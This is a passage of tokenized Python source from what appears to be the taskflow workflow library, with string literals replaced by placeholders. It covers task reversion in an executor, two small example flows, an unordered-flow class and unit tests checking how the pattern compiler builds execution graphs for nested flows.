EVENT_UPDATE_PROGRESS ) : <EOL> progress_callback = functools . partial ( self . _on_update_progress , <EOL> task ) <EOL> else : <EOL> progress_callback = None <EOL> return self . _task_executor . revert_task ( <EOL> task , task_uuid , arguments , task_result , failures , <EOL> progress_callback = progress_callback ) <EOL> def complete_reversion ( self , task , result ) : <EOL> if isinstance ( result , failure . Failure ) : <EOL> self . change_state ( task , states . REVERT_FAILURE , result = result ) <EOL> else : <EOL> self . change_state ( task , states . REVERTED , progress = <NUM_LIT:1.0> , <EOL> result = result ) </s>
<s> import logging <EOL> import os <EOL> import sys <EOL> logging . basicConfig ( level = logging . ERROR ) <EOL> top_dir = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> os . pardir , <EOL> os . pardir ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , top_dir ) <EOL> import taskflow . engines <EOL> from taskflow . patterns import graph_flow as gf <EOL> from taskflow import task <EOL> import example_utils as eu <EOL> class CompileTask ( task . Task ) : <EOL> """<STR_LIT>""" <EOL> default_provides = '<STR_LIT>' <EOL> def execute ( self , source_filename ) : <EOL> object_filename = '<STR_LIT>' % os . path . splitext ( source_filename ) [ <NUM_LIT:0> ] <EOL> print ( '<STR_LIT>' <EOL> % ( source_filename , object_filename ) ) <EOL> return object_filename <EOL> class LinkTask ( task . Task ) : <EOL> """<STR_LIT>""" <EOL> default_provides = '<STR_LIT>' <EOL> def __init__ ( self , executable_path , * args , ** kwargs ) : <EOL> super ( LinkTask , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _executable_path = executable_path <EOL> def execute ( self , ** kwargs ) : <EOL> object_filenames = list ( kwargs . values ( ) ) <EOL> print ( '<STR_LIT>' <EOL> % ( self . _executable_path , <EOL> '<STR_LIT:U+002CU+0020>' . join ( object_filenames ) ) ) <EOL> return self . _executable_path <EOL> class BuildDocsTask ( task . Task ) : <EOL> """<STR_LIT>""" <EOL> default_provides = '<STR_LIT>' <EOL> def execute ( self , ** kwargs ) : <EOL> for source_filename in kwargs . values ( ) : <EOL> print ( "<STR_LIT>" % source_filename ) <EOL> return '<STR_LIT>' <EOL> def make_flow_and_store ( source_files , executable_only = False ) : <EOL> flow = gf . TargetedFlow ( '<STR_LIT>' ) <EOL> object_targets = [ ] <EOL> store = { } <EOL> for source in source_files : <EOL> source_stored = '<STR_LIT>' % source <EOL> object_stored = '<STR_LIT>' % source <EOL> store [ source_stored ] = source <EOL> object_targets . append ( object_stored ) <EOL> flow . 
add ( CompileTask ( name = '<STR_LIT>' % source , <EOL> rebind = { '<STR_LIT>' : source_stored } , <EOL> provides = object_stored ) ) <EOL> flow . add ( BuildDocsTask ( requires = list ( store . keys ( ) ) ) ) <EOL> object_targets . append ( '<STR_LIT>' ) <EOL> link_task = LinkTask ( '<STR_LIT>' , requires = object_targets ) <EOL> flow . add ( link_task ) <EOL> if executable_only : <EOL> flow . set_target ( link_task ) <EOL> return flow , store <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> SOURCE_FILES = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> eu . print_wrapped ( '<STR_LIT>' ) <EOL> flow , store = make_flow_and_store ( SOURCE_FILES ) <EOL> taskflow . engines . run ( flow , store = store ) <EOL> eu . print_wrapped ( '<STR_LIT>' ) <EOL> flow , store = make_flow_and_store ( SOURCE_FILES , executable_only = True ) <EOL> taskflow . engines . run ( flow , store = store ) </s>
<s> import logging <EOL> import os <EOL> import random <EOL> import sys <EOL> import time <EOL> logging . basicConfig ( level = logging . ERROR ) <EOL> top_dir = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> os . pardir , <EOL> os . pardir ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , top_dir ) <EOL> import futurist <EOL> import six <EOL> from taskflow import engines <EOL> from taskflow . patterns import unordered_flow as uf <EOL> from taskflow import task <EOL> from taskflow . utils import threading_utils as tu <EOL> class DelayedTask ( task . Task ) : <EOL> def __init__ ( self , name ) : <EOL> super ( DelayedTask , self ) . __init__ ( name = name ) <EOL> self . _wait_for = random . random ( ) <EOL> def execute ( self ) : <EOL> print ( "<STR_LIT>" % ( self . name , tu . get_ident ( ) ) ) <EOL> time . sleep ( self . _wait_for ) <EOL> f1 = uf . Flow ( "<STR_LIT>" ) <EOL> f1 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> f1 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> f2 = uf . Flow ( "<STR_LIT>" ) <EOL> f2 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> f2 . add ( DelayedTask ( "<STR_LIT>" ) ) <EOL> with futurist . ThreadPoolExecutor ( ) as ex : <EOL> e1 = engines . load ( f1 , engine = '<STR_LIT>' , executor = ex ) <EOL> e2 = engines . load ( f2 , engine = '<STR_LIT>' , executor = ex ) <EOL> iters = [ e1 . run_iter ( ) , e2 . run_iter ( ) ] <EOL> cloned_iters = list ( iters ) <EOL> while iters : <EOL> for it in cloned_iters : <EOL> try : <EOL> six . next ( it ) <EOL> except StopIteration : <EOL> try : <EOL> iters . remove ( it ) <EOL> except ValueError : <EOL> pass </s>
<s> from taskflow import flow <EOL> from taskflow . types import graph as gr <EOL> class Flow ( flow . Flow ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , retry = None ) : <EOL> super ( Flow , self ) . __init__ ( name , retry ) <EOL> self . _graph = gr . Graph ( name = name ) <EOL> def add ( self , * items ) : <EOL> """<STR_LIT>""" <EOL> for item in items : <EOL> if not self . _graph . has_node ( item ) : <EOL> self . _graph . add_node ( item ) <EOL> return self <EOL> def __len__ ( self ) : <EOL> return len ( self . _graph ) <EOL> def __iter__ ( self ) : <EOL> for item in self . _graph : <EOL> yield item <EOL> def iter_links ( self ) : <EOL> for ( u , v , e_data ) in self . _graph . edges_iter ( data = True ) : <EOL> yield ( u , v , e_data ) <EOL> def iter_nodes ( self ) : <EOL> for n , n_data in self . _graph . nodes_iter ( data = True ) : <EOL> yield ( n , n_data ) <EOL> @ property <EOL> def requires ( self ) : <EOL> requires = set ( ) <EOL> retry_provides = set ( ) <EOL> if self . _retry is not None : <EOL> requires . update ( self . _retry . requires ) <EOL> retry_provides . update ( self . _retry . provides ) <EOL> for item in self : <EOL> item_requires = item . requires - retry_provides <EOL> requires . update ( item_requires ) <EOL> return frozenset ( requires ) </s>
<s> from taskflow import engines <EOL> from taskflow . engines . action_engine import compiler <EOL> from taskflow import exceptions as exc <EOL> from taskflow . patterns import graph_flow as gf <EOL> from taskflow . patterns import linear_flow as lf <EOL> from taskflow . patterns import unordered_flow as uf <EOL> from taskflow import retry <EOL> from taskflow import test <EOL> from taskflow . tests import utils as test_utils <EOL> def _replicate_graph_with_names ( compilation ) : <EOL> g = compilation . execution_graph <EOL> n_g = g . __class__ ( name = g . name ) <EOL> for node , node_data in g . nodes_iter ( data = True ) : <EOL> n_g . add_node ( node . name , attr_dict = node_data ) <EOL> for u , v , u_v_data in g . edges_iter ( data = True ) : <EOL> n_g . add_edge ( u . name , v . name , attr_dict = u_v_data ) <EOL> return n_g <EOL> class PatternCompileTest ( test . TestCase ) : <EOL> def test_task ( self ) : <EOL> task = test_utils . DummyTask ( name = '<STR_LIT:a>' ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( task ) . compile ( ) ) <EOL> self . assertEqual ( [ '<STR_LIT:a>' ] , list ( g . nodes ( ) ) ) <EOL> self . assertEqual ( [ ] , list ( g . edges ( ) ) ) <EOL> def test_retry ( self ) : <EOL> r = retry . AlwaysRevert ( '<STR_LIT>' ) <EOL> self . assertRaises ( TypeError , compiler . PatternCompiler ( r ) . compile ) <EOL> def test_wrong_object ( self ) : <EOL> msg_regex = '<STR_LIT>' <EOL> self . assertRaisesRegexp ( TypeError , msg_regex , <EOL> compiler . PatternCompiler ( <NUM_LIT> ) . compile ) <EOL> def test_empty ( self ) : <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> compiler . PatternCompiler ( flo ) . compile ( ) <EOL> def test_linear ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) <EOL> inner_flo . add ( d ) <EOL> flo . 
add ( inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> order = g . topological_sort ( ) <EOL> self . assertEqual ( [ '<STR_LIT:test>' , '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , <EOL> "<STR_LIT>" , '<STR_LIT:d>' , "<STR_LIT>" , <EOL> '<STR_LIT>' ] , order ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:c>' , "<STR_LIT>" ) ) <EOL> self . assertTrue ( g . has_edge ( "<STR_LIT>" , '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , <EOL> g . get_edge_data ( "<STR_LIT>" , '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> self . assertEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> def test_invalid ( self ) : <EOL> a , b , c = test_utils . make_many ( <NUM_LIT:3> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c ) <EOL> flo . add ( flo ) <EOL> self . assertRaises ( ValueError , <EOL> compiler . PatternCompiler ( flo ) . compile ) <EOL> def test_unordered ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = uf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> self . assertEqual ( set ( [ '<STR_LIT:test>' ] ) , set ( g . no_predecessors_iter ( ) ) ) <EOL> def test_linear_nested ( self ) : <EOL> a , b , c , d = test_utils . 
make_many ( <NUM_LIT:4> ) <EOL> flo = lf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b ) <EOL> inner_flo = uf . Flow ( "<STR_LIT>" ) <EOL> inner_flo . add ( c , d ) <EOL> flo . add ( inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> sub_g = g . subgraph ( [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> self . assertFalse ( sub_g . has_edge ( '<STR_LIT:b>' , '<STR_LIT:a>' ) ) <EOL> self . assertTrue ( sub_g . has_edge ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ) <EOL> self . assertEqual ( { '<STR_LIT>' : True } , sub_g . get_edge_data ( "<STR_LIT:a>" , "<STR_LIT:b>" ) ) <EOL> sub_g = g . subgraph ( [ '<STR_LIT:c>' , '<STR_LIT:d>' ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , sub_g . number_of_edges ( ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:b>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:c>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:d>' ) ) <EOL> def test_unordered_nested ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = uf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b ) <EOL> flo2 = lf . Flow ( "<STR_LIT>" ) <EOL> flo2 . add ( c , d ) <EOL> flo . add ( flo2 ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_unordered_nested_in_linear ( self ) : <EOL> a , b , c , d = test_utils . 
make_many ( <NUM_LIT:4> ) <EOL> inner_flo = uf . Flow ( '<STR_LIT>' ) . add ( b , c ) <EOL> flo = lf . Flow ( '<STR_LIT>' ) . add ( a , inner_flo , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_graph ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> compilation = compiler . PatternCompiler ( flo ) . compile ( ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( compilation . execution_graph ) ) <EOL> self . assertEqual ( <NUM_LIT:8> , compilation . execution_graph . number_of_edges ( ) ) <EOL> def test_graph_nested ( self ) : <EOL> a , b , c , d , e , f , g = test_utils . make_many ( <NUM_LIT:7> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> flo2 = lf . Flow ( '<STR_LIT>' ) <EOL> flo2 . add ( e , f , g ) <EOL> flo . add ( flo2 ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:11> , len ( g ) ) <EOL> self . assertItemsEqual ( g . 
edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:e>' ) , <EOL> ( '<STR_LIT:e>' , '<STR_LIT:f>' ) , <EOL> ( '<STR_LIT:f>' , '<STR_LIT:g>' ) , <EOL> ( '<STR_LIT:g>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_graph_nested_graph ( self ) : <EOL> a , b , c , d , e , f , g = test_utils . make_many ( <NUM_LIT:7> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> flo2 = gf . Flow ( '<STR_LIT>' ) <EOL> flo2 . add ( e , f , g ) <EOL> flo . add ( flo2 ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:11> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:c>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT:d>' ) , <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:e>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:f>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:g>' ) , <EOL> ( '<STR_LIT:e>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:f>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:g>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_graph_links ( self ) : <EOL> a , b , c , d = test_utils . make_many ( <NUM_LIT:4> ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) <EOL> flo . add ( a , b , c , d ) <EOL> flo . link ( a , b ) <EOL> flo . 
link ( b , c ) <EOL> flo . link ( c , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:6> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT:d>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:d>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> def test_graph_dependencies ( self ) : <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ '<STR_LIT:x>' ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ '<STR_LIT:x>' ] ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( a , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:4> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT:b>' , { '<STR_LIT>' : set ( [ '<STR_LIT:x>' ] ) } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> def test_graph_nested_requires ( self ) : <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ '<STR_LIT:x>' ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> c = test_utils . 
ProvidesRequiresTask ( '<STR_LIT:c>' , provides = [ ] , requires = [ '<STR_LIT:x>' ] ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) . add ( b , c ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( a , inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:7> , len ( g ) ) <EOL> self . assertItemsEqual ( g . edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT:a>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : set ( [ '<STR_LIT:x>' ] ) } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , list ( g . no_predecessors_iter ( ) ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , list ( g . no_successors_iter ( ) ) ) <EOL> def test_graph_nested_provides ( self ) : <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ '<STR_LIT:x>' ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ '<STR_LIT:x>' ] , requires = [ ] ) <EOL> c = test_utils . ProvidesRequiresTask ( '<STR_LIT:c>' , provides = [ ] , requires = [ ] ) <EOL> inner_flo = lf . Flow ( "<STR_LIT>" ) . add ( b , c ) <EOL> flo = gf . Flow ( "<STR_LIT:test>" ) . add ( a , inner_flo ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertEqual ( <NUM_LIT:7> , len ( g ) ) <EOL> self . assertItemsEqual ( g . 
edges ( data = True ) , [ <EOL> ( '<STR_LIT:test>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:a>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:a>' , { '<STR_LIT>' : set ( [ '<STR_LIT:x>' ] ) } ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:b>' , '<STR_LIT:c>' , { '<STR_LIT>' : True } ) , <EOL> ( '<STR_LIT:c>' , '<STR_LIT>' , { '<STR_LIT>' : True } ) , <EOL> ] ) <EOL> self . assertItemsEqual ( [ '<STR_LIT:test>' ] , g . no_predecessors_iter ( ) ) <EOL> self . assertItemsEqual ( [ '<STR_LIT>' ] , g . no_successors_iter ( ) ) <EOL> def test_empty_flow_in_linear_flow ( self ) : <EOL> flo = lf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> empty_flo = gf . Flow ( "<STR_LIT>" ) <EOL> flo . add ( a , empty_flo , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertItemsEqual ( g . edges ( ) , [ <EOL> ( "<STR_LIT>" , "<STR_LIT:a>" ) , <EOL> ( "<STR_LIT:a>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT:b>" ) , <EOL> ( "<STR_LIT:b>" , "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_many_empty_in_graph_flow ( self ) : <EOL> flo = gf . Flow ( '<STR_LIT:root>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> flo . add ( a ) <EOL> b = lf . Flow ( '<STR_LIT:b>' ) <EOL> b_0 = test_utils . ProvidesRequiresTask ( '<STR_LIT>' , provides = [ ] , requires = [ ] ) <EOL> b_1 = lf . Flow ( '<STR_LIT>' ) <EOL> b_2 = lf . Flow ( '<STR_LIT>' ) <EOL> b_3 = test_utils . ProvidesRequiresTask ( '<STR_LIT>' , provides = [ ] , requires = [ ] ) <EOL> b . add ( b_0 , b_1 , b_2 , b_3 ) <EOL> flo . add ( b ) <EOL> c = lf . Flow ( '<STR_LIT:c>' ) <EOL> c_0 = lf . 
Flow ( '<STR_LIT>' ) <EOL> c_1 = lf . Flow ( '<STR_LIT>' ) <EOL> c_2 = lf . Flow ( '<STR_LIT>' ) <EOL> c . add ( c_0 , c_1 , c_2 ) <EOL> flo . add ( c ) <EOL> d = test_utils . ProvidesRequiresTask ( '<STR_LIT:d>' , provides = [ ] , requires = [ ] ) <EOL> flo . add ( d ) <EOL> flo . link ( b , d ) <EOL> flo . link ( a , d ) <EOL> flo . link ( c , d ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flo ) . compile ( ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:root>' , '<STR_LIT:a>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:root>' , '<STR_LIT:b>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:root>' , '<STR_LIT:c>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT:a>' , '<STR_LIT:d>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:d>' ) ) <EOL> self . assertTrue ( g . has_edge ( '<STR_LIT>' , '<STR_LIT:d>' ) ) <EOL> self . assertEqual ( <NUM_LIT:20> , len ( g ) ) <EOL> def test_empty_flow_in_nested_flow ( self ) : <EOL> flow = lf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ ] ) <EOL> flow2 = lf . Flow ( "<STR_LIT>" ) <EOL> c = test_utils . ProvidesRequiresTask ( '<STR_LIT:c>' , provides = [ ] , requires = [ ] ) <EOL> d = test_utils . ProvidesRequiresTask ( '<STR_LIT:d>' , provides = [ ] , requires = [ ] ) <EOL> empty_flow = gf . Flow ( "<STR_LIT>" ) <EOL> flow2 . add ( c , empty_flow , d ) <EOL> flow . 
add ( a , flow2 , b ) <EOL> g = _replicate_graph_with_names ( <EOL> compiler . PatternCompiler ( flow ) . compile ( ) ) <EOL> for u , v in [ ( '<STR_LIT>' , '<STR_LIT:a>' ) , ( '<STR_LIT:a>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:c>' ) , ( '<STR_LIT:c>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' ) , ( '<STR_LIT:d>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:b>' ) , ( '<STR_LIT:b>' , '<STR_LIT>' ) ] : <EOL> self . assertTrue ( g . has_edge ( u , v ) ) <EOL> def test_empty_flow_in_graph_flow ( self ) : <EOL> flow = lf . Flow ( '<STR_LIT>' ) <EOL> a = test_utils . ProvidesRequiresTask ( '<STR_LIT:a>' , provides = [ '<STR_LIT:a>' ] , requires = [ ] ) <EOL> b = test_utils . ProvidesRequiresTask ( '<STR_LIT:b>' , provides = [ ] , requires = [ '<STR_LIT:a>' ] ) <EOL> empty_flow = lf . Flow ( "<STR_LIT>" ) <EOL> flow . add ( a , empty_flow , b ) <EOL> compilation = compiler . PatternCompiler ( flow ) . compile ( ) <EOL> g = compilation . execution_graph <EOL> self . assertTrue ( g . has_edge ( flow , a ) ) <EOL> self . assertTrue ( g . has_edge ( a , empty_flow ) ) <EOL> empty_flow_successors = g . successors ( empty_flow ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( empty_flow_successors ) ) <EOL> empty_flow_terminal = empty_flow_successors [ <NUM_LIT:0> ] <EOL> self . assertIs ( empty_flow , empty_flow_terminal . flow ) <EOL> self . assertEqual ( compiler . FLOW_END , <EOL> g . node [ empty_flow_terminal ] 